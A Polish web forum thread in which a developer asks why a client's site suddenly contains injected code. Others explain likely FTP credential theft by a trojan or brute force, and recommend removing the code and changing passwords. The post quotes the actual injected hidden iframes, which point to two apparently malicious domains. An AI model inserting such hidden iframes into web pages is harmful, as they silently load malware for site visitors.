Forum PHP.pl

Znajomy poprosił mnie o pewne przeróbki na stronie jego firmy. Zrobiłem wszystko jak należy, a następnie zakutalizowałem pliki. Oczywiście sprawdzałem czy wszytsko chodzi tak jak powinno. Nie było żadnego problemu. Dziś dzwoni do mnie i mówi że strona nie działa - wywala błąd php w składni w "index.php". Najdziwniejsze jest to, że pliku index.php w ogóle nigdy nie modyfikowałem. Zaglądam do kodu patrze a tu na końcu linijka:

[HTML] pobierz, plaintext 
<iframe src="http://nonfatcarbest.cn/ts/in.cgi?mozila16" width=2 height=4 style="visibility: hidden"></iframe>
[HTML] pobierz, plaintext 

i jescze w innym miejscu coś takiego:

[PHP] pobierz, plaintext 
<?php
echo "<iframe src=\"http://nakulpi.net/?click=C42244\" width=1 height=1 style=\"visibility:hidden;position:absolute\"></iframe>";
?>
[PHP] pobierz, plaintext 

Skąd to mogło się wziąć? I jak zapobiec żeby znowu nie "wlazło" ?

było o tym kilka razy , wywal to i zmień hasło do ftp

Przeszukałem forum i nie mogę znaleźć. Może jednak ktoś byłby tak miły i podzielił się wiedzą?

przecież powiedziałem , wywalasz frame z indexów i zmieniasz hasło na ftp (IMG:http://forum.php.pl/style_emoticons/default/rolleyes.gif)

To zrobiłem w pierwszej kolejnosći. Ale proszę o odp na pytanie:

z komputera tego osobnika co mial haslo do ftp zwyczajny wirus/keylogger etc skopiowal haslo ftp. polaczyl sie i w index.php pododawal takie cuda

W niedziele miałem takiego exploita u siebie. Firma hostingowa stwierdziła, że włamali się za pomocą brute-forca (podstawianie znaków). W internecie znalazłem też informacje, że jeżeli masz folder tmp na serwerze i CHMOD 711 to jest na to jakiś exploit (nie wiem, czy to prawda) i trzecia możliwość ściągnąłeś trojana i on pobrał hasła z zapamiętanych w kliencie ftp lub zapisując to co wpisywałeś podczas logowania.

Jak masz gównianie skonfigurowany serwer to nawet exploita nie potrzebujesz a jak masz dobrze skonfigurowany to nawet exploit nie pomoże.

Pewnie używasz Total Commandera do połączeń z ftp (IMG:http://forum.php.pl/style_emoticons/default/smile.gif)

W dodatku po wejściu na taką stronę AVAST ostrzega o tym że znajduję na niej ROBAK.


Miałem identyczny problem usunąłem ze wszystkich plików index.php / .html te IFRAME'y zmieniłem hasło na FTP i teraz działa bez problemu. Oczywiście nie używam juz Total'a

Pisałem już co i jak: http://forum.php.pl/index.php?s=&showt...st&p=598818
Czasami wystarczy skorzystać z szukajki...

Ten post edytował ExPlOiT 8.05.2009, 13:06:56

to mi się wydaje dosyć dziwne, chyba trudno nie zauważyć, że na jakieś konto ftp jest 10000 nieudanych prób zalogowania w krótkim czasie? to chyba źle świadczy o poziomie bezpieczeństwa hostingu jeśli pozwala na taki atak... co innego atakować np zahasłowane archiwum .rar na swoim komputerze

tak mi się wydaje, bo nie znam się na tym zbytnio - jestem ciekawy co sądzą specjaliści od bezpieczeństwa (IMG:http://forum.php.pl/style_emoticons/default/smile.gif)

Też nie sądze, że to był brute force, ale tak mi napisali w wiadomości. Chociaż jeżeli np. mają dobrego botneta i jakoś rozłożyli atak np. na pół roku to możliwe.